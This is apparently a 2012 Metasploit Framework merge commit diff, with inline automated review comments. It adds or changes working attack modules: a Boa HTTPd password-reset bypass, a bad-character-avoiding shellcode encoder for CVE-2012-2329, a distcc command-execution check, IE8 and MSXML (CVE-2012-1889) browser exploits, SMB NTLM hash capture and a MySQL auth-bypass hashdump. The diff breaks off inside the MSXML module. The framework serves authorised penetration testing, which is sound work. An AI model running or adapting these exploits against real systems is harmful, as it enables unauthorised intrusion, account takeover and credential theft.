
Merge branch 'master' into release

2 parents ee66cce + 4739aff commit d8f9bfb0d718e6e0b2e3a078e0739a98621fc07d @todb todb committed Jun 18, 2012
2 HACKING
@@ -31,7 +31,7 @@ interfaces other than msfconsole, such as msfrpc and msfgui, won't see
your output. You can use print_line to accomplish the same thing as
puts.
-2. Don't read from from standard input, doing so will make your code
+2. Don't read from standard input, doing so will make your code
lock up the entire module when called from other interfaces. If you
need user input, you can either register an option or expose an
interactve session type specific for the type of exploit.
0 data/java/metasploit/AESEncryption.class 100644 → 100755
File mode changed.
2 lib/gemcache/ruby/1.9.1/bin/mdm_console
@@ -1,4 +1,4 @@
-#!/usr/local/rvm/rubies/ruby-1.9.3-p125/bin/ruby
+#!/usr/bin/env ruby_noexec_wrapper
#
# This file was generated by RubyGems.
#
2 ...asploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/report.rb
@@ -5,7 +5,7 @@ def self.included(base)
belongs_to :workspace, :class_name => "Mdm::Workspace"
serialize :options, ::MetasploitDataModels::Base64Serializer.new
- validates_format_of :name, :with => /^[A-Za-z0-9\x20\x2e\x2d\x5c]+$/, :message => "name must be A-Z, 0-9, space, dot, underscore, or dash", :allow_blank => true
+ validates_format_of :name, :with => /^[A-Za-z0-9\x20\x2e\x2d\x5f\x5c]+$/, :message => "name must consist of A-Z, 0-9, space, dot, underscore, or dash", :allow_blank => true
serialize :options, MetasploitDataModels::Base64Serializer.new
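Review bot: The new regex on the `validates_format_of :name` line still anchors with `^`/`$`, which in Ruby match at line boundaries, so a name containing a newline followed by a permitted run of characters passes the format check; anchor the whole string instead: `:with => /\A[A-Za-z0-9\x20\x2e\x2d\x5f\x5c]+\z/`. The error message also omits the backslash (`\x5c`) that the character class permits, so it understates what is accepted. This file is a vendored copy under lib/gemcache, so the same change belongs in the metasploit_data_models gem itself.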
2 lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec
@@ -6,7 +6,7 @@ Gem::Specification.new do |s|
s.required_rubygems_version = Gem::Requirement.new("> 1.3.1") if s.respond_to? :required_rubygems_version=
s.authors = ["Trevor Rosen"]
- s.date = "2012-06-13"
+ s.date = "2012-06-18"
s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions."
s.email = ["trevor_rosen@rapid7.com"]
s.executables = ["mdm_console"]
4 lib/msf/core/encoder.rb
@@ -106,6 +106,10 @@ module Type
#
NonUpperUtf8Safe = "non_upper_utf8_safe"
#
+ # tolower safe underscore safe for CVE-2012-2329 - PHP CGI apache_request_headers bof
+ #
+ NonUpperUnderscoreSafe = "non_upper_underscore"
+ #
# May result in the generation of any characters
#
Unspecified = "unspecified"
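Review bot: The new constant's string value `"non_upper_underscore"` breaks the naming pattern of its neighbours, whose values end in `_safe` (`NonUpperUtf8Safe = "non_upper_utf8_safe"` directly above it); since the constant is brand new, `NonUpperUnderscoreSafe = "non_upper_underscore_safe"` would keep the type names consistent before anything depends on the string. The comment `# tolower safe underscore safe for CVE-2012-2329 ...` reads awkwardly; `# Does not produce uppercase letters or the underscore byte (0x5f); added for CVE-2012-2329 (PHP CGI apache_request_headers overflow)` says the same thing in the style of the surrounding entries. The enclosing `module Type` begins and ends outside the hunk.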
114 modules/auxiliary/admin/http/intersil_pass_reset.rb
@@ -0,0 +1,114 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
+ 'Description' => %q{
+ The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
+ allows basic authentication bypass when the user string is greater
+ than 127 bytes long. The long string causes the password to be
+ overwritten in memory, which enables the attacker to reset the
+ password. In addition, the malicious attempt also may cause a
+ denial-of-service condition.
+
+ Please note that you must set the request URI to the directory that
+ requires basic authentication in order to work properly.
+ },
+ 'Author' =>
+ [
+ 'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
+ 'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
+ 'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html']
+ ],
+ 'DisclosureDate' => 'Sep 10 2007'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "The request URI", '/']),
+ OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
+ ], self.class)
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri'=>'/',
+ 'method'=>'GET'
+ })
+
+ if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
+ print_status("#{@peer} - Boa Version Detected: #{m[1]}")
+ return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
+ return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
+ return Exploit::CheckCode::Vulnerable
+ else
+ print_status("#{@peer} - Not a Boa Server!")
+ return Exploit::CheckCode::Safe # not a boa server
+ end
+
+ rescue Rex::ConnectionRefused
+ print_error("#{@peer} - Connection refused by server.")
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def run
+ @peer = "#{rhost}:#{rport}"
+ return if check != Exploit::CheckCode::Vulnerable
+
+ uri = target_uri.path
+ uri << '/' if uri[-1,1] != '/'
+
+ res = send_request_cgi({
+ 'uri'=> uri,
+ 'method'=>'GET',
+ 'basic_auth' => "#{Rex::Text.rand_text_alpha(127)}:#{datastore['PASSWORD']}"
+ })
+
+ if res.nil?
+ print_error("#{@peer} - The server may be down")
+ return
+ elsif res and res.code != 401
+ print_status("#{@peer} - #{uri} does not have basic authentication enabled")
+ return
+ end
+
+ print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten")
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method'=> 'GET',
+ 'basic_auth' => "admin:#{datastore['PASSWORD']}"
+ })
+
+ if not res
+ print_error("#{@peer} - Server timedout, will not continue")
+ return
+ end
+
+ case res.code
+ when 200
+ print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
+ when 401
+ print_error("#{@peer} - Access forbidden. The password reset attempt did not work")
+ else
+ print_status("#{@peer} - Unexpected response: Code #{res.code} encountered")
+ end
+
+ end
+end
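Review bot: `check` dereferences `res.headers['Server']` without a nil guard, so a response that carries no Server header raises NoMethodError, which the `rescue Rex::ConnectionRefused` clause does not catch; `if (res and res.headers['Server'] and (m = res.headers['Server'].match(/Boa\/(.*)/)))` closes that gap. The version test `m[1][3].ord-48>4` assumes at least four characters in the captured version string and also raises on a shorter value such as `0.9`; comparing a parsed version (for example via `Gem::Version.new(m[1])`) would be clearer than per-character arithmetic. `check` also reads `@peer`, which is only assigned in `run`, so invoking `check` on its own prints an empty peer; `@peer ||= "#{rhost}:#{rport}"` at the top of `check` fixes that.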
12 modules/auxiliary/gather/enum_dns.rb
@@ -54,6 +54,7 @@ def initialize(info = {})
[
OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]),
OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]),
+ OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]),
], self.class)
end
@@ -453,10 +454,11 @@ def axfr(target, nssrv)
end
end
else
- print_error("Zone transfer failed")
+ print_error("Zone transfer failed (length was zero)")
end
- rescue
- print_error("Zone transfer failed")
+ rescue Exception => e
+ print_error("Error executing zone transfer: #{e.message}")
+ elog("Error executing zone transfer: #{e.message}\n#{e.backtrace.join("\n")}")
end
end
@@ -467,6 +469,10 @@ def axfr(target, nssrv)
def run
@res = Net::DNS::Resolver.new()
+ if datastore['TCP_DNS']
+ vprint_status("Using DNS/TCP")
+ @res.use_tcp = true
+ end
@res.retry = datastore['RETRY'].to_i
@res.retry_interval = datastore['RETRY_INTERVAL'].to_i
@threadnum = datastore['THREADS'].to_i
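Review bot: The `rescue Exception => e` introduced in the `axfr` hunk (`@@ -453,10 +454,11 @@`) also swallows Interrupt, SystemExit and NoMemoryError, so a user pressing Ctrl-C during a zone transfer gets "Error executing zone transfer" logged instead of the module stopping; `rescue ::StandardError => e` keeps the new diagnostic logging without that side effect. The bare `rescue` it replaces caught only StandardError, so this is a behaviour change beyond the improved message. The body of `axfr` begins and ends outside the hunk.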
2 modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
@@ -130,7 +130,7 @@ def run_host(ip)
:socket => s,
:db => nil
})
- print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts"
+ print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{rhost}:#{rport}"
results << x
rescue RbMysql::AccessDeniedError
rescue Exception => e
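Review bot: The credentials appended on the new `print_status` line are interpolated raw into a `mysql://user:pass@host:port` URI, so a password containing `@`, `:` or `/` produces a URI that cannot be parsed back unambiguously; percent-encoding the two components (for instance with `Rex::Text.uri_encode`) before interpolation keeps the line copy-pasteable. Whether `username` and `password` are the loop variables in scope here cannot be confirmed from the hunk, since `run_host` begins outside it.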
2 modules/auxiliary/scanner/telnet/telnet_version.rb
@@ -42,7 +42,7 @@ def run_host(ip)
::Timeout.timeout(to) do
res = connect
# This makes db_services look a lot nicer.
- banner_santized = Rex::Text.to_hex_ascii(banner.to_s.unpack('C*').pack('U*'))
+ banner_santized = Rex::Text.to_hex_ascii(banner.to_s)
print_status("#{ip}:#{rport} TELNET #{banner_santized}")
report_service(:host => rhost, :port => rport, :name => "telnet", :info => banner_santized)
end
32 modules/auxiliary/server/capture/smb.rb
@@ -122,17 +122,17 @@ def smb_cmd_dispatch(cmd, c, buff)
elsif wordcount == 0x0C
smb_cmd_session_setup(c, buff, true)
else
- print_status("Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... ")
+ print_status("SMB Capture - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... ")
smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS, @s_smb_esn)
end
when CONST::SMB_COM_TREE_CONNECT
- print_status("Denying tree connect from #{smb[:name]}")
+ print_status("SMB Capture - Denying tree connect from #{smb[:name]} - #{smb[:ip]}")
smb_error(cmd, c, SMB_SMB_STATUS_ACCESS_DENIED, @s_smb_esn)
else
- print_status("Ignoring request from #{smb[:name]} (#{cmd})")
+ print_status("SMB Capture - Ignoring request from #{smb[:name]} - #{smb[:ip]} (#{cmd})")
smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS, @s_smb_esn)
end
end
@@ -226,7 +226,7 @@ def smb_cmd_session_setup(c, buff, esn)
if start
blob.slice!(0,start)
else
- print_status("Error finding NTLM in SMB_COM_SESSION_SETUP_ANDX request from #{smb[:name]}, ignoring ...")
+ print_status("SMB Capture - Error finding NTLM in SMB_COM_SESSION_SETUP_ANDX request from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
end
@@ -318,11 +318,11 @@ def smb_cmd_session_setup(c, buff, esn)
:nt_cli_challenge => ntlm_message.ntlm_response[16, nt_len - 16].unpack('H*')[0]
}
elsif nt_len == 0
- print_status("Empty hash from #{smb[:name]} captured, ignoring ... ")
+ print_status("SMB Capture - Empty hash from #{smb[:name]} - #{smb[:ip]} captured, ignoring ... ")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
else
- print_status("Unknown hash type from #{smb[:name]}, ignoring ...")
+ print_status("SMB Capture - Unknown hash type from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
end
@@ -339,7 +339,7 @@ def smb_cmd_session_setup(c, buff, esn)
begin
smb_get_hash(smb,arg,true)
rescue ::Exception => e
- print_status("Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
+ print_status("SMB Capture - Error processing Hash from #{smb[:name]} - #{smb[:ip]} : #{e.class} #{e} #{e.backtrace}")
end
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
@@ -379,11 +379,11 @@ def smb_cmd_session_setup(c, buff, esn)
:nt_cli_challenge => pkt['Payload'].v['Payload'][lm_len + 16, nt_len - 16].unpack("H*")[0]
}
elsif nt_len == 0
- print_status("Empty hash captured from #{smb[:name]} captured, ignoring ... ")
+ print_status("SMB Capture - Empty hash captured from #{smb[:name]} - #{smb[:ip]} captured, ignoring ... ")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
else
- print_status("Unknown hash type capture from #{smb[:name]}, ignoring ...")
+ print_status("SMB Capture - Unknown hash type capture from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
end
@@ -401,7 +401,7 @@ def smb_cmd_session_setup(c, buff, esn)
smb_get_hash(smb,arg,false)
rescue ::Exception => e
- print_status("Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
+ print_status("SMB Capture - Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
end
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
@@ -441,7 +441,7 @@ def smb_get_hash(smb, arg = {}, esn=true)
when NTLM_CONST::NTLM_V1_RESPONSE
if NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [nt_hash].pack("H*"),:srv_challenge => @challenge,
:ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE, :type => 'ntlm' })
- print_status("NLMv1 Hash correspond to an empty password, ignoring ... ")
+ print_status("SMB Capture - NLMv1 Hash correspond to an empty password, ignoring ... #{smb[:ip]}")
return
end
if (lm_hash == nt_hash or lm_hash == "" or lm_hash =~ /^0*$/ ) then
@@ -459,7 +459,7 @@ def smb_get_hash(smb, arg = {}, esn=true)
:user => Rex::Text::to_ascii(smb[:username]),
:domain => Rex::Text::to_ascii(smb[:domain]),
:ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE, :type => 'ntlm' })
- print_status("NTLMv2 Hash correspond to an empty password, ignoring ... ")
+ print_status("SMB Capture - NTLMv2 Hash correspond to an empty password, ignoring ... #{smb[:ip]}")
return
end
if lm_hash == '0' * 32 and lm_cli_challenge == '0' * 16
@@ -481,7 +481,7 @@ def smb_get_hash(smb, arg = {}, esn=true)
if NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [nt_hash].pack("H*"),:srv_challenge => @challenge,
:cli_challenge => [lm_hash].pack("H*")[0,8],
:ntlm_ver => NTLM_CONST::NTLM_2_SESSION_RESPONSE, :type => 'ntlm' })
- print_status("NTLM2_session Hash correspond to an empty password, ignoring ... ")
+ print_status("SMB Capture - NTLM2_session Hash correspond to an empty password, ignoring ... #{smb[:ip]}")
return
end
lm_hash_message = lm_hash
@@ -500,13 +500,13 @@ def smb_get_hash(smb, arg = {}, esn=true)
when NTLM_CONST::NTLM_V1_RESPONSE
smb_db_type_hash = "smb_netv1_hash"
capturelogmessage =
- "#{capturedtime}\nNTLMv1 Response Captured from #{smb[:name]} \n" +
+ "SMB Captured - #{capturedtime}\nNTLMv1 Response Captured from #{smb[:name]} - #{smb[:ip]} \n" +
"USER:#{smb[:username]} DOMAIN:#{smb[:domain]} OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}\n" +
"LMHASH:#{lm_hash_message ? lm_hash_message : "<NULL>"} \nNTHASH:#{nt_hash ? nt_hash : "<NULL>"}\n"
when NTLM_CONST::NTLM_V2_RESPONSE
smb_db_type_hash = "smb_netv2_hash"
capturelogmessage =
- "#{capturedtime}\nNTLMv2 Response Captured from #{smb[:name]} \n" +
+ "SMB Captured - #{capturedtime}\nNTLMv2 Response Captured from #{smb[:name]} - #{smb[:ip]} \n" +
"USER:#{smb[:username]} DOMAIN:#{smb[:domain]} OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}\n" +
"LMHASH:#{lm_hash_message ? lm_hash_message : "<NULL>"} " +
"LM_CLIENT_CHALLENGE:#{lm_chall_message ? lm_chall_message : "<NULL>"}\n" +
@@ -517,7 +517,7 @@ def smb_get_hash(smb, arg = {}, esn=true)
#also 'real' netv1 is almost never seen nowadays except with smbmount or msf server capture
smb_db_type_hash = "smb_netv1_hash"
capturelogmessage =
- "#{capturedtime}\nNTLM2_SESSION Response Captured from #{smb[:name]} \n" +
+ "SMB Captured - #{capturedtime}\nNTLM2_SESSION Response Captured from #{smb[:name]} - #{smb[:ip]} \n" +
"USER:#{smb[:username]} DOMAIN:#{smb[:domain]} OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}\n" +
"NTHASH:#{nt_hash ? nt_hash : "<NULL>"}\n" +
"NT_CLIENT_CHALLENGE:#{lm_hash_message ? lm_hash_message[0,16] : "<NULL>"} \n"
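Review bot: The prefix added to the capture messages is inconsistent: the `print_status` lines use `SMB Capture - ` while the three `capturelogmessage` strings in the `smb_get_hash` hunks use `SMB Captured - `, and the error line in the `@@ -401,7 +401,7 @@` hunk is the only one that omits the ` - #{smb[:ip]}` suffix its sibling in the `@@ -339,7 +339,7 @@` hunk gained. Settling on one prefix (e.g. `SMB Capture - `) and adding ` - #{smb[:ip]}` to that last `print_status` lets a single grep pattern match every capture line. All enclosing methods begin and end outside the hunks.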
209 modules/encoders/x86/avoid_underscore_tolower.rb
@@ -0,0 +1,209 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Encoder
+
+ # This encoder has a manual ranking because it should only be used in cases
+ # where information has been explicitly supplied, like the BufferOffset.
+ Rank = ManualRanking
+
+ # This encoder is a modified version of the sakpe's Avoid UTF8/tolower one, having
+ # into account the next set of bad chars for CVE-2012-2329 exploitation:
+ # "\x00\x0d\x0a"
+ # "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
+ # "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5f"
+ # "\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e"
+ # "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f"
+ def initialize
+ super(
+ 'Name' => 'Avoid underscore/tolower',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ Underscore/tolower Safe Encoder used to exploit CVE-2012-2329. It is a
+ modified version of the 'Avoid UTF8/tolower' encoder by skape. Please check
+ the documentation of the skape encoder before using it. As the original,
+ this encoder expects ECX pointing to the start of the encoded payload. Also
+ BufferOffset must be provided if needed.
+
+ The changes introduced are (1) avoid the use of the 0x5f byte (underscore) in
+ because it is a badchar in the CVE-2012-2329 case and (2) optimize the
+ transformation block, having into account more relaxed conditions about bad
+ characters greater than 0x80.
+ },
+ 'Author' =>
+ [
+ 'skape', # avoid_utf8_lower Author
+ 'juan vazquez' # Adapted to be usable on CVE-2012-2329
+ ],
+ 'Arch' => ARCH_X86,
+ 'License' => MSF_LICENSE,
+ 'EncoderType' => Msf::Encoder::Type::NonUpperUnderscoreSafe,
+ 'Decoder' =>
+ {
+ 'KeySize' => 4,
+ 'BlockSize' => 4,
+ })
+ end
+
+ #
+ # Returns the decoder stub that is adjusted for the size of
+ # the buffer being encoded
+ #
+ def decoder_stub(state)
+ len = ((state.buf.length + 3) & (~0x3)) / 4
+
+ # Grab the number of additional bytes that we need to adjust by in order
+ # to get the context register to point immediately after the stub header
+ off = (datastore['BufferOffset'] || 0).to_i
+
+ # Check to make sure that the length is a valid size
+ while is_badchar(state, len)
+ # Prepend "\x90" nops to avoid break anything. Anyway it's going to be encoded.
+ state.buf = "\x90\x90\x90\x90" + state.buf
+ len = ((state.buf.length + 3) & (~0x3)) / 4
+ end
+
+ decoder =
+ "\x6a" + [len].pack('C') + # push len
+ "\x6b\x3c\x24\x09" + # imul 0x9
+ "\x60" + # pusha
+ "\x03\x0c\x24" + # add ecx, [esp]
+ "\x6a" + [0x11+off].pack('C') + # push byte 0x11 + off
+ "\x03\x0c\x24" + # add ecx, [esp]
+ "\x6a\x04" # push byte 0x4
+
+ # encoded sled
+ state.context = ''
+
+ return decoder
+ end
+
+ def encode_block(state, block)
+ buf = try_add(state, block)
+
+ if (buf.nil?)
+ buf = try_sub(state, block)
+ end
+
+ if (buf.nil?)
+ raise BadcharError.new(state.encoded, 0, 0, 0)
+ end
+
+ buf
+ end
+
+ #
+ # Appends the encoded context portion.
+ #
+ def encode_end(state)
+ state.encoded += state.context
+ end
+
+ #
+ # Generate the instructions that will be used to produce a valid
+ # block after decoding using the sub instruction in conjunction with
+ # two underscore/tolower safe values.
+ #
+ def try_sub(state, block)
+ buf = "\x81\x29";
+ vbuf = ''
+ ctx = ''
+ carry = 0
+
+ block.each_byte { |b|
+
+ x = 0
+ y = 0
+ attempts = 0
+ prev_carry = carry
+
+ begin
+ carry = prev_carry
+
+ if (b > 0x80)
+ diff = 0x100 - b
+ y = rand(0x80 - diff - 1).to_i + 1
+ x = (0x100 - (b - y + carry))
+ carry = 1
+ else
+ diff = 0x7f - b
+ x = rand(diff - 1) + 1
+ y = (b + x + carry) & 0xff
+ carry = 0
+ end
+
+ attempts += 1
+
+ # Lame.
+ return nil if (attempts > 512)
+
+ end while (is_badchar(state, x) or is_badchar(state, y))
+
+ vbuf += [x].pack('C')
+ ctx += [y].pack('C')
+ }
+
+ buf += vbuf + "\x03\x0c\x24"
+
+ state.context += ctx
+
+ return buf
+
+ end
+
+ #
+ # Generate instructions that will be used to produce a valid block after
+ # decoding using the add instruction in conjunction with two underscore/tolower
+ # safe values.
+ #
+ def try_add(state, block)
+ buf = "\x81\x01"
+ vbuf = ''
+ ctx = ''
+
+ block.each_byte { |b|
+
+ attempts = 0
+
+ begin
+ if b == 0x00
+ xv = rand(b - 1) # badchars will kill 0x00 if it isn't allowed
+ else
+ xv = rand(b - 1) + 1
+ end
+
+
+ attempts += 1
+
+ # Lame.
+ return nil if (attempts > 512)
+
+ end while (is_badchar(state, xv) or is_badchar(state, b - xv))
+
+ vbuf += [xv].pack('C')
+ ctx += [b - xv].pack('C')
+ }
+
+ buf += vbuf + "\x03\x0c\x24"
+
+ state.context += ctx
+
+ return buf
+ end
+
+ def is_badchar(state, val)
+ (val >= 0x41 and val <= 0x5a) or val == 0x5f or Rex::Text.badchar_index([val].pack('C'), state.badchars)
+ end
+
+end
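Review bot: In `try_sub`, `x = rand(diff - 1) + 1` is evaluated with `diff - 1 == 0` when the input byte is 0x7e, and `Kernel#rand(0)` returns a Float, so the following `y = (b + x + carry) & 0xff` raises NoMethodError (Float has no `&`) instead of encoding the block; the `b > 0x80` branch already guards this with `.to_i`, so `x = rand(diff - 1).to_i + 1` brings the two branches in line. `try_add` has the same shape at `xv = rand(b - 1) + 1` for the byte 0x01, where `rand(0)` again yields a Float that `pack('C')` then truncates; `xv = rand(b - 1).to_i + 1` keeps the arithmetic integral. Both paths are only reached when the random pick also passes `is_badchar`, so the failure is intermittent rather than deterministic.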
6 modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Auxiliary::Report
def initialize(info = {})
- super(update_info(info,
+ super(update_info(info, {
'Name' => 'F5 BIG-IP SSH Private Key Exposure',
'Version' => '$Revision$',
'Description' => %q{
@@ -44,8 +44,8 @@ def initialize(info = {})
],
'DisclosureDate' => "Jun 11 2012",
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
- 'DefaultTarget' => 0,
- ))
+ 'DefaultTarget' => 0
+ }))
register_options(
[
47 modules/exploits/unix/misc/distcc_exec.rb
@@ -63,6 +63,21 @@ def initialize(info = {})
], self.class)
end
+ def check
+ r = rand_text_alphanumeric(10)
+ connect
+ sock.put(dist_cmd("sh", "-c", "echo #{r}"))
+
+ dtag = rand_text_alphanumeric(10)
+ sock.put("DOTI0000000A#{dtag}\n")
+
+ err, out = read_output
+ if out.index(r)
+ return Exploit::CheckCode::Vulnerable
+ end
+ return Exploit::CheckCode::Safe
+ end
+
def exploit
connect
@@ -72,6 +87,21 @@ def exploit
dtag = rand_text_alphanumeric(10)
sock.put("DOTI0000000A#{dtag}\n")
+ err, out = read_output
+
+ (err || "").split("\n") do |line|
+ print_status("stderr: #{line}")
+ end
+ (out || "").split("\n") do |line|
+ print_status("stdout: #{line}")
+ end
+
+ handler
+ disconnect
+ end
+
+ def read_output
+
res = sock.get_once(24, 5)
if !(res and res.length == 24)
@@ -85,29 +115,22 @@ def exploit
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]
- return if not len
+ return [nil, nil] if not len
if (len > 0)
- res = sock.get_once(len, 5)
- res.split("\n").each do |line|
- print_status("stderr: #{line}")
- end
+ err = sock.get_once(len, 5)
end
# Check STDOUT
res = sock.get_once(4, 5)
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]
- return if not len
+ return [err, nil] if not len
if (len > 0)
- res = sock.get_once(len, 5)
- res.split("\n").each do |line|
- print_status("stdout: #{line}")
- end
+ out = sock.get_once(len, 5)
end
+ return [err, out]
- handler
- disconnect
end
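Review bot: The two `(err || "").split("\n") do |line| ... end` loops added to `exploit` pass a block to `String#split`, which in the Ruby 1.9 series this tree targets (see the gemcache paths) ignores the block and just returns the array, so the stderr/stdout lines the removed `.split("\n").each do |line|` loops used to print are no longer shown; restore `.each` on both. In `check`, `out` is nil whenever `read_output` returns `[nil, nil]` or `[err, nil]`, so `out.index(r)` raises NoMethodError on a short or silent response; `return Exploit::CheckCode::Vulnerable if out && out.index(r)` guards it. `check` also calls `connect` without a matching `disconnect`, so each check leaks the socket. `read_output` starts in the second hunk and its body continues into the third.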
15 modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -18,8 +18,8 @@ def initialize(info={})
'Description' => %q{
This module exploits a memory corruption flaw in Internet Explorer 8 when
handling objects with the same ID property. At the moment this module targets
- IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited
- in the wild.
+ IE8 over Windows XP SP3 and Windows 7. This module supports heap massaging
+ as well as the heap spray method seen in the wild (Java msvcrt71.dll).
},
'License' => MSF_LICENSE,
'Author' =>
@@ -69,7 +69,7 @@ def initialize(info={})
}
],
[
- 'IE 8 on Windows 7 SP1 with JRE ROP',
+ 'IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP',
{
'Rop' => :jre,
'RopOffset' => '0x5f4',
@@ -93,10 +93,11 @@ def get_target(agent)
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
- #Windows XP SP3 + IE 8.0
+ # Windows XP SP3 + IE 8.0
return targets[1]
- elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
- #Windows 7 SP1 + IE 8.0
+ elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8\.0/
+ # Windows 7 SP1 + IE 8.0
+ # Vista SP2 + IE 8.0
return targets[3]
else
return nil
@@ -335,4 +336,4 @@ def on_request_uri(cli, request)
mshtml!DllGetClassObject+0xafd09:
6363fcc6 8b5070 mov edx,dword ptr [eax+70h]
ds:0023:1c1c1c7c=????????
-=end
+=end
363 modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -0,0 +1,363 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GoodRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::Remote::BrowserAutopwn
+ autopwn_info({
+ :ua_name => HttpClients::IE,
+ :ua_minver => "6.0",
+ :ua_maxver => "8.0",
+ :javascript => true,
+ :os_name => OperatingSystems::WINDOWS,
+ :classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}",
+ :method => "definition",
+ :rank => NormalRanking
+ })
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Microsoft XML Core Services MSXML Uninitialized Memory Corruption",
+ 'Description' => %q{
+ This module exploits a memory corruption flaw in Microsoft XML Core Services
+ when trying to access an uninitialized Node with the getDefinition API, which
+ may corrupt memory allowing remote code execution.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'inking26', # Reliable exploitation
+ 'binjo', # Metasploit module
+ 'sinn3r', # Metasploit module
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-1889' ],
+ [ 'BID', '53934' ],
+ [ 'OSVDB', '82873'],
+ [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],
+ [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],
+ [ 'URL', 'http://hi.baidu.com/inking26/blog/item/9c2ab11c4784e5aa86d6b6c1.html' ]
+ ],
+ 'Payload' =>
+ {
